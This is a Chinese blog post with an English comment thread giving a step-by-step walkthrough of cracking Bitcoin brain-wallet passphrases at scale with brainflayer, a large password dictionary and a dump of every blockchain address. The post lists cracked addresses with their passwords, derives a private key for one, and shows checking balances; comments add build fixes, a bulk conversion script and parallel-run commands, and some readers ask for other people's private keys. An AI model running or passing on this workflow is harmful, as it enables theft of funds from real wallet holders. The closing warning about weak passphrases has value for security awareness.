脑钱包破解工具实测

引言:
白帽黑客发布比特币脑钱包掠夺者,每秒可猜测13万个密码
http://www.8btc.com/new-cracking-tool

下面是基于上面这则新闻进行的脑钱包密码破解的实战测试。

先给出脑钱包暴力破解代码 brainflayer 下载地址: https://github.com/ryancdotorg/brainflayer

1. 暴力破解脑钱包,首先要有个强大的字典文件。
本测试使用CrackStation的密码字典,本字典文件为15G,包含了差不多15亿个密码。下载地址: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. 安装好比特币服务 https://github.com/bitcoin/bitcoin
如果不知道怎么装,那下面的内容就别试了,看着玩吧。

3. 利用开源的区块链工具 Blockparser 获取所有的比特币地址。
Blockparser 下载地址: https://github.com/znort987/blockparser
运行Blockparser 获取目前所有的比特币地址

./parser allBalances > allBalances.txt

这是一个相当耗内存的操作,建议64G的内存。
由于 allBalances.txt 文件中包含了金额等其他信息,需要用 awk 命令行整理下 allBalances.txt 的内容,我们只需要比特币地址信息。

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Brainflayer 破解程序要求输入的比特币地址格式为 Hash160,所以需要把上面获取的所有比特币地址转换为 Hash160 格式。
类似的工具很多,我用的是下面这个 Perl 代码: http://lenschulwitz.com/base58
稍加修改就能转换整个文件了。(后面的评论里有代码)

5. 用Brainflayer 文件包中的工具 hex2blf 把 Hash160 地址转换为布隆过滤文件。
Brainflayer 利用这个布隆过滤器,大大提高了密码破解速度。

hex2blf btcaddress.hex btcaddress.blf

6. 开始破解!

brainflayer -b btcaddress.blf -i password.txt

我还真没想到刚开始运行就输出了几十个破解结果,虽然全部运行完这15G的密码文件需要好几个小时,但是破解效率还是真不错。用CrackStation的密码字典查出了将近2万个比特币地址和相应的脑钱包密码!

7. 来分析下这些被破解的密码: (第一栏是比特币地址Hash160格式,最后一栏是密码)

简单的就不多说了。

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

那些很长的数字密码都能被破解:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

字母密码看起来15位以内的都没用,破解了太多了。

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

再看看有些很长的密码都能破解,有点心惊。

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

还有中文名做密码的

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Brainflayer 输出的地址是 Hash160格式,还是用上面第4步里的工具,转换回普通的比特币地址。
例如: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
转换为比特币地址是: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
脑钱包密码是 1satoshi

9. 你们是不是很关心这些地址里还有没有币?
Blockchain.info 上可以查询余额。
也可以通过API查询

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

我查了好多破解的地址,余额全部为0,应该是这些简单的字典破解的账号,早被人把余额转走了。

10. 最后就是,如果真的某个地址里有余额,那么对应的秘钥是什么?
开源代码 Addressgen 提供了根据脑钱包密码生成比特币地址和秘钥的功能。

https://github.com/sarchar/addressgen

以上面的 ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi 为例,第8步给出了比特币地址是:
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,下面通过 Addressgen 来验证。

运行

./genaddress.py -p 1satoshi

输出如下:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

从上面可以看到,比特币地址正是 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
而对应的秘钥为 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

总结:
使用脑钱包的密码一定要非常强大,即使是好多个单词都不一定安全。这个测试只用了一台主机几个小时的运算时间,就检验了15亿的密码组合。
如果租个几十台云主机破解一个月,破解的密码组合可以到十万亿以上。大家可以算算自己的密码强度够不够!

68 thoughts on “脑钱包破解工具实测

  • 星期一 七月 25th, 2016 at 09:54
    Permalink

    i need a more in depth tutorial on how to do this step by step properly Thanks if you can send me one by email please

    Reply
    • 星期二 八月 2nd, 2016 at 12:55
      Permalink

      Sorry, I don’t have a step by step tutorial.

      Reply
  • 星期六 七月 30th, 2016 at 16:43
    Permalink

    Hi pal great tut dose this still work would love to give it a shot

    Reply
  • 星期四 九月 22nd, 2016 at 03:24
    Permalink

    Hi,

    Great article,!

    I have one problem though, at step 4, since i am not a developer, i am having a hard time figuring out what change to do to make it process a whole file. I am using a csv file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    Reply
    • 星期四 九月 22nd, 2016 at 15:46
      Permalink

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

      my $fileSrc = 'base58.txt';
      open my $fhSrc, $fileSrc or die "Could not open $fileSrc: $!";
      
      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";
      
      while( my $base58_encoded_address = <$fhSrc>)  {   
        my $binary_address = decodebase58tohex($base58_encoded_address);
        say $fhDest $binary_address;
      }
      
      close $fhSrc;
      close $fhDest;
      

      This should read base58 address from base58.txt and save the hex format address to hex.txt.

      Reply
      • 星期四 九月 22nd, 2016 at 15:54
        Permalink

        Awesome, it worked!

        Thank you!

        Reply
  • 星期日 九月 25th, 2016 at 17:18
    Permalink

    hopefully someone can make a full detail on how to make this work in linux.

    Reply
    • 星期日 九月 25th, 2016 at 17:19
      Permalink

      a tutorial i mean 🙂

      Reply
  • 星期三 十一月 9th, 2016 at 16:25
    Permalink

    how long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing???

    I can make video tut if Jack doesn’t mind. I cant explain much of background processes as I usually compile and pack all data tightly and quickly to script it.

    Reply
    • 星期日 十一月 13th, 2016 at 21:58
      Permalink

      use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

      Reply
    • 星期六 一月 21st, 2017 at 06:40
      Permalink

      Do you have an video tutorial, it where be great 😀

      Reply
      • 星期二 一月 24th, 2017 at 15:59
        Permalink

        I don’t have any video tutorial for this.

        Reply
  • 星期三 十二月 28th, 2016 at 01:05
    Permalink

    does it still work

    Reply
  • 星期五 一月 20th, 2017 at 04:09
    Permalink

    Good day and keep up the good work. Please I omitted step 1 – 3 because I am trying to use my wallet ID to check how secured my wallet is but got stuck on step 4 to 5.
    Need Clarification on the following as a new be to programming:

    1. Do I need to follow the procedure you suggested on “Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
    rename it to base58perl.pl”
    2. If I am to do same after the modification, where do I upload the update?

    3. After the aforementioned steps, in what environment in github ( Is it “bitcoin command prompt” or “brain flayercommand prompt”), do I input the command “hex2blf btcaddress.hex btcaddress.blf” ?

    4. Also. will I replace btcaddress.hex with the hex value of my public key generated via http://lenschulwitz.com/base58

    Thank you as I await your esteemed clarification

    Reply
    • 星期二 一月 24th, 2017 at 16:50
      Permalink

      1. Yes
      2. You upload the file to where the btcaddress.hex file is on. Then run the Perl script to convert addresses in btcaddress.hex to Hash160 format
      3. run the command “hex2blf” in Linux environment
      4. Yes, btcaddress.hex will be updated to Hash160 format

      Reply
  • 星期四 一月 26th, 2017 at 04:38
    Permalink

    Thanks so much for your valued feedback.
    Pls help clarify as I am new to programming and my background is Windows.
    1. Would all the downloads from step 1 to step 7 to mounted on Linux OS like Ubuntu, KDE etc or on github?
    2. Pls. under which tool will l locate btcaddress.hex?
    Apologies to bore you as I await your feedback.

    Reply
    • 星期二 二月 7th, 2017 at 11:25
      Permalink

      1. all tools run on Linux OS
      2. you create the file btcaddress.hex at step 3

      Reply
  • 星期三 三月 8th, 2017 at 16:52
    Permalink

    upon make request for brainflayer i recieve this error:

    gcc -O3 -flto -funsigned-char -falign-functions=16 -falign-loops=16 -falign-jumps=16 -Wall -Wextra -Wno-pointer-sign -Wno-sign-compare -pedantic -std=gnu99 -static brainflayer.o hex.o bloom.o mmapf.o hsearchf.o ec_pubkey_fast.o ripemd160_256.o dldummy.o algo/brainwalletio.o algo/warpwallet.o algo/keccak.o algo/sha3.o algo/brainv2.o secp256k1/.libs/libsecp256k1.a scrypt-jane/scrypt-jane.o -lssl -lrt -lcrypto -lz -lgmp -o brainflayer
    /usr/bin/ld: cannot find -lgmp
    collect2: error: ld returned 1 exit status
    Makefile:68: recipe for target ‘brainflayer’ failed
    make: *** [brainflayer] Error 1

    help please

    Reply
    • 星期二 十月 3rd, 2017 at 15:39
      Permalink
      sudo apt-get install libgmp3-dev
      Reply
  • 星期六 三月 11th, 2017 at 18:19
    Permalink

    please which app did you use to run the program

    Reply
  • 星期四 四月 27th, 2017 at 07:08
    Permalink

    Hello pls i need a private key of someone how can i get that all the app that i download did not work pls help me out
    13Ugd1nDEgr9WPTZQVoxu4saqvwetkz7B4

    1J7R8Q2N22Skg9QPAEhW8wBR1jEA4bJPo8

    1H1jr23Vvc9iM575p8QqqM7RWjcaJRHZ6a
    thanks

    Reply
    • 星期五 五月 5th, 2017 at 12:22
      Permalink

      This tool is not for the purpose of recovering the private key for a given bitcoin address.

      Reply
  • 星期三 五月 3rd, 2017 at 03:16
    Permalink

    Hi Jack,

    I have tried every step in this tutorial (I stripped the 0 balance hashes out), but no luck so far.
    Could you provide a hash that i can put in my list that will definitely result in a match? My brainflayer has been running for quite some time, and there are 0 hits.

    Reply
    • 星期五 五月 5th, 2017 at 12:10
      Permalink

      The sample hash in this post should work.

      Reply
  • 星期一 五月 22nd, 2017 at 13:15
    Permalink

    How do I run any of these files on windows?
    To me these are just folders with random files I have no idea what to do with..
    Just a little help on that would be greatly appreciated!

    Thank You.

    Reply
    • 星期四 六月 22nd, 2017 at 22:29
      Permalink

      These tools run on Linux. I don’t have the Windows version.

      Reply
  • 星期二 五月 23rd, 2017 at 02:44
    Permalink

    Hi Jack,
    I have a question when I run the last program you gave us I ge this error,
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 456, in
    main()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 411, in main
    public_key, private_key = gen_key_pair()
    File “D:\George\Crack\GeorgeS\addressgen-master\genaddress.py”, line 94, in gen_key_pair
    if ssl_library.EC_KEY_generate_key(k) != 1:
    OSError: exception: access violation reading 0xFFFFFFFFD96E1A98
    I import the libeay32.dll both also for win64 also for win 32.
    How can I use this tool, ?

    Reply
    • 星期四 六月 22nd, 2017 at 22:31
      Permalink

      Sorry, I haven’t used these tools on Windows.

      Reply
  • 星期五 五月 26th, 2017 at 20:54
    Permalink

    if you could make an offline step by step video all we will be very apreciated sir thanks for share your knoledge with us

    Reply
  • 星期四 六月 1st, 2017 at 00:01
    Permalink

    Hello.
    I have encrypted DOGE wallet.
    I convert encrypted address HERE : http://lenschulwitz.com/base58
    After make this command
    1):-Name:~/brainflayer$ ./hex2blf btcaddress.hex btcaddress.blf
    [*] Initializing bloom filter…
    [*] Loading hash160s from ‘btcaddress.hex’ 100.0%
    [*] Loaded 1 hashes, false positive rate: ~2.298e-167 (1 in ~4.351e+166)
    [*] Writing bloom filter to ‘btcaddress.blf’…
    [+] Success!
    r@r-System-Product-Name:~/brainflayer$

    and create password.txt.

    2)Then use –
    :Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt
    r@r-System-Product-Name:~/brainflayer$

    But output nothing.
    Whats wrong.?I should install doge daemon and parse doge blockchain??
    Very need help!

    Reply
  • 星期四 六月 1st, 2017 at 00:31
    Permalink

    seems it work,but no found password

    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s

    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs

    What is wrong???

    Reply
  • 星期四 六月 1st, 2017 at 13:01
    Permalink

    Hello.
    I try now find my doge wallet password.Ubuntu 17.04
    But I not have install DOGE wallet like .dogecoin
    I just use address doge wallet on site http://lenschulwitz.com/base58 got hash from him and did btcaddress.blf .

    seems it work,but no found password
    Name:~/brainflayer$ ./brainflayer -b btcaddress.blf -i password.txt -v -o r.txt
    rate: 382.29 p/s found: 0/7 elapsed: 0.018 s
    1E6B167A33CC29B7A3284499E5093E1F1DEDA7AE8C59C661A2 -hash
    password is 34os48trs
    passwordlist^
    4t4t4tr5
    45454545
    454545rt
    4r4r4r5t
    34os48trs
    34os48Trs
    349848trs
    What is wrong???
    If you cannot help me or wont do it -let me know to my email .Thanx

    Reply
    • 星期三 八月 16th, 2017 at 10:30
      Permalink

      Have you solved the problem? I have the same problem.

      Reply
  • 星期四 六月 8th, 2017 at 03:08
    Permalink

    Can we use this on an addresd that has balance already. And we just want to find the private key as well as password? I assume it can be done by pasting the address in the txt file, and then carrying on the procedure?

    Reply
    • 星期四 六月 22nd, 2017 at 22:18
      Permalink

      No, this is not a tool to crack or generate private key for a given bitcoin address.

      Reply
  • 星期一 六月 26th, 2017 at 13:00
    Permalink

    good day dear Jack
    great tool …
    so with this tool one could find brainpasswords and would be able to transfer out the funds?
    doesn’t it make it too easy for the evil-doers?
    thank you …

    Reply
  • 星期一 六月 26th, 2017 at 18:36
    Permalink

    With this tool it’s possible to crack a brainwallet private key if you’re lucky. It’s a brute-force password cracking tool.

    This is why brainwallet.org permanently closed.

    Reply
    • 星期日 八月 13th, 2017 at 19:16
      Permalink

      i forgot my wallet.dat password 🙁 completly 🙁 it was generated randomly with simple passgen tool, and .txt that was containing it – lost.

      All i have is wallet.dat

      this tutorial is useless for me?

      Reply
      • 星期五 九月 1st, 2017 at 11:21
        Permalink

        No, you can’t use this to recover your private key.

        Reply
  • 星期六 七月 29th, 2017 at 11:27
    Permalink

    hello here please is still working i am working on a security to make blockchain more better

    Reply
  • 星期日 八月 20th, 2017 at 11:38
    Permalink

    Hi Jack.

    Do I need any other dependencies. I have windows so have installed Vm Virtualbox to run Ubuntu.

    I’ve downloaded the full folder from github but when I run the first line. hex2blf btcaddress.hex btcaddress.blf, it says command not found.

    I have navigated to the correct folder using cd, then ls will display all files.

    I have tried
    ./hex2blf btcaddress.hex btcaddress.blf
    ./hex2blf ./btcaddress.hex btcaddress.blf
    hex2blf.c btcaddress.hex btcaddress.blf
    ./hex2blf.c ./btcaddress.hex btcaddress.blf

    pretty much everything I can think of but the terminal with give a bash error, or say command not found.

    Please can you assist on what set up I need.
    Thanks

    Reply
    • 星期五 九月 1st, 2017 at 11:34
      Permalink

      You need to compile the source code you downloaded from the Github.

      Reply
  • 星期五 九月 1st, 2017 at 11:29
    Permalink

    I am having problem installing the brainflayer on my Linux 2017

    Reply
  • 星期五 九月 1st, 2017 at 12:18
    Permalink

    Hi.
    Thank you for helping. I have this up and it appears to be running correctly. I ran it on an address I new I would get a match for and it came back as 1 found. But did not tell me which address was found of the key it used to match, how can I see this?

    Also under point 4, convert addresses to hash160. Is there a bulk tool for this?

    Thank you.

    Reply
    • 星期四 九月 28th, 2017 at 11:40
      Permalink

      check my previous reply for the hash160 conversion tool. or search for “base58perl.pl” on this page.

      Reply
  • 星期四 九月 28th, 2017 at 08:55
    Permalink

    When i’am trying to hex a bitcoin address with base58perl.pl it gaves me addional 00 before and 8 numbers after. How to fix that ? Cause brainflayer do not accept this hex.

    Reply
  • 星期四 九月 28th, 2017 at 11:12
    Permalink

    In other words everything works like a charm a part of :

    1) lenschulwitz base58 converter
    when i take your bitcoin address example like 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
    it gaves me 00EC42AD7FD54F931274B83F6137379206E458B1063EC89E96 instead of
    ec42ad7fd54f931274b83f6137379206e458b106. Seems same a part of 00 at start and 8 digits more at the end. I cant understand why. Both times even i do it on his website or in perl in my terminal, the result is the same. In other converters everything ok but you cant do massive conversion.

    2) In brainflayer you have result : ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
    and my is ec42ad7fd54f931274b83f6137379206e458b106:u:Sha256:1satoshi.
    the diference is only between str and sha256, i do all the same as you but result is different. i dont know if its depends on some additional keyword you add in promt line or no. Any way its working.

    Waiting for your comment, with best regards, Alex.

    Reply
    • 星期四 九月 28th, 2017 at 12:12
      Permalink

      00EC42AD7FD54F931274B83F6137379206E458B1063EC89E96 is the same as
      ec42ad7fd54f931274b83f6137379206e458b106

      This bitcoin address is a 25 bytes number which is linked to the hash 160 as follows:
      address = [Version Byte (1)][Hash 160 (20)][Checksum (4)]

      The version byte is simply 0x00 for the main bitcoin network and the 4 checksum bytes are simply the first 4 bytes of the double sha256 hash of the 21 bytes [Version Byte][Hash 160]

      To get only the hash160 in step 4, update the code in base58perl.pl
      change from:
      say $fhDest $binary_address;
      to:
      say $fhDest substr $binary_address, 2, 40;

      Reply
      • 星期四 九月 28th, 2017 at 12:27
        Permalink

        Thank you very much for your answer. Now it is working in proper way, with this additional string.
        I know that they are the same, but unfortunately brainflayer don’t want to accept hash160 in that way, and as i don’t understand in coding, i was confused. Now everything working fine.

        Thank you again, and have a nice day !

        Reply
  • 星期二 十月 3rd, 2017 at 15:34
    Permalink

    Brainflayer required devel libs installed (dependencies)

    sudo apt-get install openssl
    sudo apt-get install libgmp3-dev 
    sudo apt-get install libimobiledevice-dev libplist-dev libusbmuxd-dev libssl-dev zlib1g-dev
    sudo apt-get install dh-autoreconf
    
    Reply
  • 星期二 十月 3rd, 2017 at 15:48
    Permalink

    You might need to update Makefile in Brainflayer if you receive the following error message when you compile the source code.
    from

    LIBS = -lssl -lrt -lcrypto -lz -lgmp

    to

    LIBS = -lssl -lrt -lcrypto -lz -lgmp -lpthread

    Error message:

    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_lock_new':
    (.text+0x25): undefined reference to `pthread_rwlock_init'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_read_lock':
    (.text+0x65): undefined reference to `pthread_rwlock_rdlock'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_write_lock':
    (.text+0x85): undefined reference to `pthread_rwlock_wrlock'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_unlock':
    (.text+0xa5): undefined reference to `pthread_rwlock_unlock'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_lock_free':
    (.text+0xca): undefined reference to `pthread_rwlock_destroy'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_run_once':
    (.text+0xf5): undefined reference to `pthread_once'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_init_local':
    (.text+0x115): undefined reference to `pthread_key_create'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_set_local':
    (.text+0x147): undefined reference to `pthread_setspecific'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_cleanup_local':
    (.text+0x167): undefined reference to `pthread_key_delete'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_get_local':
    (.text+0x133): undefined reference to `pthread_getspecific'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function `                                      CRYPTO_THREAD_get_current_id':
    (.text+0x181): undefined reference to `pthread_self'
    /usr/lib/gcc/x86_64-linux-gnu/4.8/libgcc_eh.a(unwind-dw2.o): In function `uw_init_context_1':
    (.text+0x211a): undefined reference to `pthread_once'
    collect2: error: ld returned 1 exit status
    
    Reply
  • 星期二 十月 3rd, 2017 at 16:06
    Permalink

    Brainflayer is not currently multithreaded. If you want to run it on multiple cores, you’ll have to use -n and -k options. Run brainflayer -h for more information.

    I tested brainflayer with single process on a 1 core VPS with SSD, it can check 100,000 passwords per second.
    If you run 4 processes on a 4 core VPS, it can check 400,000 password per second.

    The following command will split the password file into 4 pieces and run 4 separated processes to utilize 4 cores.

    screen -S bf1
    brainflayer -v -n 1/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    screen -S bf2
    brainflayer -v -n 2/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    screen -S bf3
    brainflayer -v -n 3/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    screen -S bf4
    brainflayer -v -n 4/4  -b btcaddress.blf -i password.txt
    Ctrl+A, D
    
    Reply
    • 星期四 十月 5th, 2017 at 05:09
      Permalink

      I have something like 75 000 p/s using 1 core in virtual box on my macbook air.
      It checks big CrackStation dictionary in 4,5 hours, and small one in 40 min.

      Maybe you have some other links for big dictionary or passpahrases list ?

      I have other interesting brute force python script that uses passpharses, but its much low speed vs brain flayer. if you are interesting i will post a link.

      Reply
  • 星期三 十月 4th, 2017 at 00:25
    Permalink

    please i find it hard setting it up for the past two mouth please somebody out there help me thank you in advance.

    Reply
  • 星期四 十月 5th, 2017 at 11:51
    Permalink

    please help me out with this errors, its shows up when am trying to compile it
    1. i have this error when trying to compile brainflayer.c
    brainflayer.c: In function ‘main’:
    brainflayer.c:818:9: warning: this decimal constant is unsigned only in ISO C90 [enabled by default]
    } else if (time_delta < 2500000000) {
    ^
    brainflayer.c:839:9: warning: format ‘%zu’ expects argument of type ‘size_t’, but argument 4 has type ‘uint64_t’ [-Wformat=]
    );
    ^
    brainflayer.c:839:9: warning: format ‘%zu’ expects argument of type ‘size_t’, but argument 5 has type ‘uint64_t’ [-Wformat=]
    /usr/bin/ld: cannot open output file brainflayer: Is a directory
    collect2: error: ld returned 1 exit status
    2. for hex2blf file
    hex2blf.c: In function ‘main’:
    hex2blf.c:57:7: warning: format ‘%ju’ expects argument of type ‘uintmax_t’, but argument 4 has type ‘__off_t’ [-Wformat=]
    fprintf(stderr, "[!] Bloom filter file '%s' is not the correct size (%ju != %d)\n", bloomfile, sb.st_size, BLOOM_SIZE);
    ^
    /tmp/ccMZW5gm.o: In function `main':
    hex2blf.c:(.text+0x9d0): undefined reference to `bloom_set_hash160'
    hex2blf.c:(.text+0xaaf): undefined reference to `exp'
    hex2blf.c:(.text+0xac3): undefined reference to `pow'
    collect2: error: ld returned 1 exit status

    thank you i will await your reply

    Reply
        • 星期三 十月 18th, 2017 at 08:19
          Permalink

          @Alex Could you please tell me how to work with such massive archives on ubuntu 14.04 or kali linux? What tool do you prefer? Is it possible to convert txt file to utf8 type automatically and how? Please leave links here in answer if you have such information. Thank you in advance.

  • 星期五 十月 6th, 2017 at 07:09
    Permalink

    Please sir can you give me a tip on how to compile the brainflayer source code.
    Thank you

    Reply
    • 星期五 十月 6th, 2017 at 08:01
      Permalink

      you use make command to compile source code.

      Reply
  • 星期五 十月 6th, 2017 at 08:23
    Permalink

    Please can u give me an example of the command please?

    Reply

发表评论

电子邮件地址不会被公开。 必填项已用*标注